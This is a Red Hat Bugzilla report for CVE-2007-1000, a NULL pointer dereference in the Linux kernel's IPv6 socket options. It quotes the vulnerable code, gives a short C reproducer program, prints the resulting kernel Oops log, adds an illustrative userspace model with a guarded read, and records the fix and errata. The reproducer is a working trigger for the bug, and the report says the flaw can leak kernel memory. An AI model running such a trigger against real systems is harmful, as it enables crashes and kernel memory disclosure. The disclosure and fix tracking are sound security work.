Bug 232257 - CVE-2007-1000 NULL pointer hole in ipv6
Status: CLOSED ERRATA
Product: Red Hat Enterprise Linux 5
Classification: Red Hat
Component: kernel
Version: 5.0
Hardware: All
OS: Linux
medium
high
Assignee: Don Howard
QA Contact: Martin Jenner
Whiteboard: impact=important,source=vendorsec,rep...
Reported: 2007-03-14 16:04 UTC by Marcel Holtmann
Modified: 2007-11-30 22:07 UTC

Fixed In Version: RHSA-2007-0169
Doc Type: Bug Fix
Last Closed: 2007-04-30 16:38:01 UTC

Links
System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2007:0169 0 normal SHIPPED_LIVE Important: kernel security and bug fix update 2007-04-30 16:36:50 UTC

Description Marcel Holtmann 2007-03-14 16:04:06 UTC
There is a NULL pointer dereference which can lead to an arbitrary kernel memory
leak, in the file net/ipv6/ipv6_sockglue.c:

	case IPV6_2292PKTOPTIONS:
	{
		struct ipv6_txoptions *opt = NULL;			/* [1] */
		struct msghdr msg;
		struct flowi fl;
		int junk;

		fl.fl6_flowlabel = 0;
		fl.oif = sk->sk_bound_dev_if;

		if (optlen == 0)
			goto update;					/* [2] */

update:
		retv = 0;
		if (inet_sk(sk)->is_icsk) {
			if (opt) {
...
			}
			opt = xchg(&np->opt, opt);			/* [3] */
			sk_dst_reset(sk);
		} else {
			write_lock(&sk->sk_dst_lock);
			opt = xchg(&np->opt, opt);			/* [4] */
			write_unlock(&sk->sk_dst_lock);
			sk_dst_reset(sk);
		}

	case IPV6_DSTOPTS:
	{

		lock_sock(sk);
		len = ipv6_getsockopt_sticky(sk, np->opt->hopopt,	/* [5] */
					     optval, len);
		release_sock(sk);
		return put_user(len, optlen);
	}

In the function do_ipv6_setsockopt(), if optname = IPV6_2292PKTOPTIONS and
optlen = 0 [2], np->opt is set to NULL [3][4].
In the function do_ipv6_getsockopt(), if optname = IPV6_DSTOPTS, np->opt is
dereferenced [5].

An attacker can read any portion of the kernel memory: ipv6_getsockopt_sticky()
copies np->opt->hopopt to optval, which is a user buffer, and np->opt can be
mmapped to NULL.

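Here is a program that reproduces the bug:
#include <sys/socket.h>
#include <netinet/in.h>
int main(int argc, char *argv[]) {
  int s;
  unsigned int optlen = 4;
  s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
  /* 6 == IPV6_2292PKTOPTIONS; optlen 0 takes the "goto update" path [2] */
  setsockopt(s, IPPROTO_IPV6, 6, (void *)NULL, 0);
  /* 59 == IPV6_DSTOPTS; reaches the np->opt dereference [5] */
  getsockopt(s, IPPROTO_IPV6, 59, (void *)NULL, &optlen);
  return 0;
}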

And the Oops output:
[17183522.904000] BUG: unable to handle kernel NULL pointer dereference at virtual address 00000008
[17183522.904000]  printing eip:
[17183522.904000] f8eba4d4
[17183522.904000] *pde = 00000000
[17183522.904000] Oops: 0000 [#1]
[17183522.904000] Modules linked in: nls_utf8 nls_cp437 vfat fat sg sd_mod usb_storage libusual binfmt_misc rfcomm hidp l2cap bluetooth fglrx speedstep_centrino cpufreq_userspace cpufreq_stats freq_table cpufreq_powersave cpufreq_ondemand cpufreq_conservative video tc1100_wmi sbs sony_acpi pcc_acpi i2c_ec i2c_core hotkey dev_acpi button battery container ac asus_acpi dm_mod md_mod sr_mod sbp2 scsi_mod parport_pc lp parport ipv6 8139cp pcmcia 8139too joydev ipw2200 mii ieee80211 ieee80211_crypt yenta_socket rsrc_nonstatic sdhci mmc_core tifm_7xx1 tifm_core tsdev pcmcia_core snd_intel8x0 snd_ac97_codec snd_ac97_bus snd_pcm_oss snd_mixer_oss snd_pcm snd_timer snd evdev intel_agp agpgart usbhid rtc soundcore snd_page_alloc shpchp pci_hotplug psmouse serio_raw ext3 jbd ohci1394 ieee1394 ehci_hcd uhci_hcd usbcore ide_generic ide_cd cdrom ide_disk piix generic thermal processor fan capability commoncap vesafb fbcon tileblit font bitblit softcursor
[17183522.904000] CPU:    0
[17183522.904000] EIP:    0060:[<f8eba4d4>]    Tainted: P      VLI
[17183522.904000] EFLAGS: 00210286   (2.6.17-11-386 #2) 
[17183522.904000] EIP is at ipv6_getsockopt+0x4e4/0x6d0 [ipv6]
[17183522.904000] eax: 00000000   ebx: d33d1b00   ecx: d33d1f18   edx: d33d1f18
[17183522.904000] esi: 00000000   edi: 00000029   ebp: 0000003b   esp: dcd07d5c
[17183522.904000] ds: 007b   es: 007b   ss: 0068
[17183522.904000] Process poc (pid: 5968, threadinfo=dcd06000 task=dbbb5540)
[17183522.904000] Stack: 00000001 00000003 dfa794d8 00200286 d33d1f18 d2b8b3ec 00000004 00000006
[17183522.904000]        c025a68b 00200296 00000000 e15f2440 d2b8b3ec 00200282 d33d1b00 00000000
[17183522.904000]        d33d1b00 00000000 f8eba94b 00000000 00000000 dfed6000 f8c9a4ff 00000000
[17183522.904000] Call Trace:
[17183522.904000]  <c025a68b> lock_sock+0xab/0xc0  <f8eba94b> ipv6_setsockopt+0x16b/0xc40 [ipv6]
[17183522.904000]  <c0f92614> __ext3_journal_stop+0x24/0x50 [ext3]  <c0179c74> __mark_inode_dirty+0x34/0x170
[17183522.904000]  <c013c78b> do_generic_mapping_read+0x42b/0x540  <c0154f74> cache_alloc_refill+0x314/0x4d0
[17183522.904000]  <c0288da6> tcp_getsockopt+0x36/0x2b0  <c016f0b7> d_alloc+0x27/0x190
[17183522.904000]  <c016f059> d_instantiate+0x49/0x80  <f8eba7e0> ipv6_setsockopt+0x0/0xc40 [ipv6]
[17183522.904000]  <c0289966> tcp_setsockopt+0x36/0x370  <c0259de3> sock_common_getsockopt+0x23/0x30
[17183522.904000]  <c025872e> sys_getsockopt+0x8e/0xc0  <c0259a44> sys_socketcall+0x234/0x280
[17183522.904000]  <c02c7a00> do_page_fault+0x0/0x6e0  <c0102dbb> sysenter_past_esp+0x54/0x79
[17183522.904000] Code: ff 8b 4c 24 10 0f b6 41 45 c0 e8 02 83 e0 01 89 84 24 54 01 00 00 e9 ee fb ff ff 89 d8 31 f6 e8 13 01 3a c7 8b 54 24 10 8b 42 58 <8b> 50 08 85 d2 74 2c 0f b6 42 01 be f2 ff ff ff 8d 3c c5 08 00
[17183522.904000] EIP: [<f8eba4d4>] ipv6_getsockopt+0x4e4/0x6d0 [ipv6] SS:ESP 0068:dcd07d5c
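
The state transition described in the report above, as an added userspace model with one way to guard the read path; this is example code, not part of the original report and not the kernel's or Red Hat's patch. The simplified struct layouts and the names model_set_pktoptions, sticky_copy, get_hopopt_unchecked, get_hopopt_checked and demo are assumptions made for the illustration.

```c
#include <string.h>

/* Constructed userspace model: names follow the excerpt, layouts are simplified. */
struct ipv6_opt_hdr { unsigned char nexthdr, hdrlen, data[6]; }; /* one 8-byte unit */
struct ipv6_txoptions { struct ipv6_opt_hdr *hopopt; };
struct ipv6_pinfo { struct ipv6_txoptions *opt; };

/* Models [2]-[4]: a zero-length request swaps NULL into np->opt. */
void model_set_pktoptions(struct ipv6_pinfo *np, struct ipv6_txoptions *new_opt, int optlen)
{
    np->opt = (optlen == 0) ? NULL : new_opt;
}

/* Copies at most one option header into the caller's buffer. */
static int sticky_copy(const struct ipv6_opt_hdr *hdr, void *optval, int len)
{
    int hdr_bytes;
    if (!hdr)
        return 0;                        /* option not set: nothing to copy */
    if (len < 0)
        return -1;
    hdr_bytes = (hdr->hdrlen + 1) * 8;   /* 8 for the constructed sample */
    if (len > hdr_bytes)
        len = hdr_bytes;
    memcpy(optval, hdr, (size_t)len);
    return len;
}

/* Pattern at [5]: np->opt is dereferenced without a check (not called here). */
int get_hopopt_unchecked(struct ipv6_pinfo *np, void *optval, int len)
{
    return sticky_copy(np->opt->hopopt, optval, len);
}

/* Guarded form: a missing option block is reported as length 0. */
int get_hopopt_checked(struct ipv6_pinfo *np, void *optval, int len)
{
    if (!np->opt)
        return 0;
    return sticky_copy(np->opt->hopopt, optval, len);
}

/* Installs constructed options, optionally clears them as in [2], reads back. */
int demo(int clear, int len)
{
    struct ipv6_opt_hdr hop = {6, 0, {1, 4, 0, 0, 0, 0}};  /* constructed PadN */
    struct ipv6_txoptions opts = { &hop };
    struct ipv6_pinfo np = { &opts };
    unsigned char buf[16];
    if (clear)
        model_set_pktoptions(&np, NULL, 0);
    return get_hopopt_checked(&np, buf, len);
}

int main(void) { return demo(1, 4); }
```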

Comment 3 Don Howard 2007-03-29 21:42:07 UTC
A patch for this issue has been included in zstream build 2.6.18-8.1.2.el5.

Comment 5 Mike Gahagan 2007-04-27 14:38:41 UTC
verified with 2.6.18-8.1.3.el5.

Comment 7 Red Hat Bugzilla 2007-04-30 16:38:01 UTC
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2007-0169.html


